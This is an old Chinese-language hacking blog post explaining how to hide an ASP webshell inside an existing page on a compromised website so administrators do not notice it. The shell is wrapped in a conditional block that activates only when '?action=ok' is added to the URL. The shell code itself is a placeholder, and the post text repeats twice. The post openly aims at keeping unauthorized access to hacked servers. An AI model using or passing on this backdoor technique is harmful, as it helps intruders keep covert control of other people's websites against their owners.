2005-11-30 22:17:34 by: h4x0r
隐蔽的插入型ASP木马
得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!
管理员都也不都是混饭吃的,所以我们要隐藏好我们的WEBSHELL,
下面是关于ASP插入型木马几种利用方法 不容易被发现~~~呵呵
我拿个webshell给大家做演示:
好,我们随便找一个要做手脚的ASP文件
1.在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="ok" then %>
##################################
<% end if %>
在#########################处加入你的shell代码
加入以后不影响正常浏揽
访问的时候在你做了手脚的ASP文件后面加上?action=ok(例如:index.asp?action=ok)
就可以调出shell了,不影响正常浏揽
大家看到了吧,呵呵
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=216
管理员都也不都是混饭吃的,所以我们要隐藏好我们的WEBSHELL,
下面是关于ASP插入型木马几种利用方法 不容易被发现~~~呵呵
我拿个webshell给大家做演示:
好,我们随便找一个要做手脚的ASP文件
1.在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="ok" then %>
##################################
<% end if %>
在#########################处加入你的shell代码
加入以后不影响正常浏揽
访问的时候在你做了手脚的ASP文件后面加上?action=ok(例如:index.asp?action=ok)
就可以调出shell了,不影响正常浏揽
大家看到了吧,呵呵
[Last Modified By h4x0r, at 2005-11-30 22:19:38]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=216
There is no comment on this article.
